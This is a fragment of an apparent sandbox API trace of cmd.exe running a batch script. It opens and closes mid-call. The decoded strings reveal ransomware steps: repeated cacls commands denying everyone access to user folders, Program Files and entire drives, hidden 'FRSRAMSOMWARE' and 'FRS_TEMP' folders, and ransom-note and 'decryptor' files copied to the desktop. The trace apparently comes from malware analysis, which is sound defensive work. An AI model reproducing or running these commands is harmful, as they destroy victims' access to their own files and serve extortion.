nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0086.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0086.348] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.348] GetFileType (hFile=0x254) returned 0x1 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0086.348] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0086.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0086.348] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.349] GetFileType (hFile=0x254) returned 0x1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0086.349] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0086.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0086.349] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.349] GetFileType (hFile=0x254) returned 0x1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0086.349] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0086.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0086.349] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.349] GetFileType (hFile=0x254) returned 0x1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0086.349] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0086.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0086.349] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.349] GetFileType (hFile=0x254) returned 0x1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0086.349] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0086.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0086.349] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.349] GetFileType (hFile=0x254) returned 0x1 [0086.349] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0086.350] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0086.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0086.350] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.350] GetFileType (hFile=0x254) returned 0x1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0086.350] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0086.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0086.350] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.350] GetFileType (hFile=0x254) returned 0x1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0086.350] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0086.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0086.350] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.350] GetFileType (hFile=0x254) returned 0x1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0086.350] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0086.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0086.350] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.350] GetFileType (hFile=0x254) returned 0x1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0086.350] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.350] SetFilePointer (in: hFile=0x254, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0086.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0086.351] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.351] GetFileType (hFile=0x254) returned 0x1 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0086.351] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0086.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0086.351] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.351] GetFileType (hFile=0x254) returned 0x1 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0086.351] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0086.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0086.351] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.351] GetFileType (hFile=0x254) returned 0x1 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0086.351] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0086.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0086.351] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.351] GetFileType (hFile=0x254) returned 0x1 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0086.351] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0086.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0086.351] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0086.351] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.352] GetFileType (hFile=0x254) returned 0x1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0086.352] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0086.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0086.352] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.352] GetFileType (hFile=0x254) returned 0x1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0086.352] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0086.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0086.352] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.352] GetFileType (hFile=0x254) returned 0x1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0086.352] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0086.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0086.352] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.352] GetFileType (hFile=0x254) returned 0x1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0086.352] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0086.352] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0086.352] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.352] GetFileType (hFile=0x254) returned 0x1 [0086.352] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0086.353] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0086.353] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0086.353] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.353] GetFileType (hFile=0x254) returned 0x1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0086.353] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0086.353] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0086.353] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.353] GetFileType (hFile=0x254) returned 0x1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0086.353] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0086.353] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0086.353] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.353] GetFileType (hFile=0x254) returned 0x1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0086.353] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0086.353] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0086.353] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.353] GetFileType (hFile=0x254) returned 0x1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0086.353] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.353] SetFilePointer (in: hFile=0x254, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0086.354] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, 